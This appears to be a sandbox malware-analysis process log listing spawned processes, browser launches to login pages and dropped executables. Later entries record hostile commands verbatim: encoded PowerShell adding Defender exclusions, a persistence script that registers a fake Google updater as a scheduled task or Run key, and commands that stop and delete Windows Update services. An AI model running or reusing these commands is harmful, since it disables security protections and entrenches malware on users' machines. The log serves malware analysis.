"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
6⤵
PID:5240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
6⤵
PID:5424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:1
6⤵
PID:5420

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4332 /prefetch:1
6⤵
PID:4548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4552 /prefetch:1
6⤵
PID:5132

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1
6⤵
PID:6180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1
6⤵
PID:6444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
6⤵
PID:6684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4260 /prefetch:1
6⤵
PID:6808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
6⤵
PID:6868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6204 /prefetch:1
6⤵
PID:7156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6472 /prefetch:1
6⤵
PID:7164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8524 /prefetch:1
6⤵
PID:5552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8844 /prefetch:8
6⤵
PID:5936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:1
6⤵
PID:412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8760 /prefetch:1
6⤵
PID:4724

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=9220 /prefetch:2
6⤵
PID:5780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9320 /prefetch:8
6⤵
PID:6860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9152 /prefetch:1
6⤵
PID:1036

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,816603309590949600,722394361109243433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9436 /prefetch:1
6⤵
PID:4264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
5⤵
PID:1628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ffd08823cb8,0x7ffd08823cc8,0x7ffd08823cd8
6⤵
PID:2836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1812,16960292586431917958,2887747207552140572,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1804 /prefetch:2
6⤵
PID:3092

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1812,16960292586431917958,2887747207552140572,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2348 /prefetch:3
6⤵
PID:3292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login
5⤵
PID:2312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ffd08823cb8,0x7ffd08823cc8,0x7ffd08823cd8
6⤵
PID:1916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1884,5775917487940816391,7400236906037163084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 /prefetch:3
6⤵
PID:5520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,5775917487940816391,7400236906037163084,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1892 /prefetch:2
6⤵
PID:5512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
5⤵
PID:3220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ffd08823cb8,0x7ffd08823cc8,0x7ffd08823cd8
6⤵
PID:1140

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform
5⤵
PID:4140

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x138,0x13c,0x140,0x114,0x144,0x7ffd08823cb8,0x7ffd08823cc8,0x7ffd08823cd8
6⤵
PID:652

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
5⤵
PID:5256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ffd08823cb8,0x7ffd08823cc8,0x7ffd08823cd8
6⤵
PID:5304

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
5⤵
PID:5544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ffd08823cb8,0x7ffd08823cc8,0x7ffd08823cd8
6⤵
PID:5736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
5⤵
PID:5204

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ffd08823cb8,0x7ffd08823cc8,0x7ffd08823cd8
6⤵
PID:1408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.linkedin.com/login
5⤵
PID:6104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ffd08823cb8,0x7ffd08823cc8,0x7ffd08823cd8
6⤵
PID:6172

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4Vh716XG.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4Vh716XG.exe
4⤵
PID:7024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 1372
5⤵
- Program crash
PID:6028

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6cW6ub0.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6cW6ub0.exe
3⤵
PID:5704

C:\Users\Admin\AppData\Local\Temp\EAA7.exe
C:\Users\Admin\AppData\Local\Temp\EAA7.exe
1⤵
PID:480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 480 -s 796
2⤵
- Program crash
PID:4468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2236 -ip 2236
1⤵
PID:1484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2236 -ip 2236
1⤵
PID:1944

C:\Users\Admin\AppData\Local\Detail\glccvjcd\StringIds.exe
C:\Users\Admin\AppData\Local\Detail\glccvjcd\StringIds.exe
1⤵
PID:4560

C:\Users\Admin\AppData\Local\Detail\glccvjcd\StringIds.exe
C:\Users\Admin\AppData\Local\Detail\glccvjcd\StringIds.exe
2⤵
PID:5676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 480 -ip 480
1⤵
PID:5076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1616 -ip 1616
1⤵
PID:4728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABTAHQAcgBpAG4AZwBJAGQAcwAuAGUAeABlADsA
1⤵
PID:4148

C:\Users\Admin\AppData\Local\Temp\c2868ed41c\bstyoops.exe
C:\Users\Admin\AppData\Local\Temp\c2868ed41c\bstyoops.exe
1⤵
PID:6136

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4632 -ip 4632
1⤵
PID:5224

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5788

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:6676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2456 -ip 2456
1⤵
PID:5136

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004C8
1⤵
PID:2924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 7024 -ip 7024
1⤵
PID:6760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5880 -ip 5880
1⤵
PID:5164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 3728 -ip 3728
1⤵
PID:6200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 6876 -ip 6876
1⤵
PID:3948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVgBhAGwAdQBlAFwATgBhAG0AZQBDAGwAYQBpAG0AVAB5AHAAZQAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVgBhAGwAdQBlAFwATgBhAG0AZQBDAGwAYQBpAG0AVAB5AHAAZQAuAGUAeABlAA==
1⤵
PID:7104

C:\ProgramData\pinterests\XRJNZC.exe
C:\ProgramData\pinterests\XRJNZC.exe
1⤵
PID:4844

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:6096

C:\Users\Admin\AppData\Roaming\Value\NameClaimType.exe
C:\Users\Admin\AppData\Roaming\Value\NameClaimType.exe
1⤵
PID:5300

C:\Users\Admin\AppData\Roaming\Value\NameClaimType.exe
C:\Users\Admin\AppData\Roaming\Value\NameClaimType.exe
2⤵
PID:3532

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5320

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1084

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:3472

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:5540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
PID:4528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
PID:4500

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:5068

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:5548

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:3552

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:6876

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:1424

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:6268

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:2912

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:2540

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:2752

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:3032

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:6672

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:6584

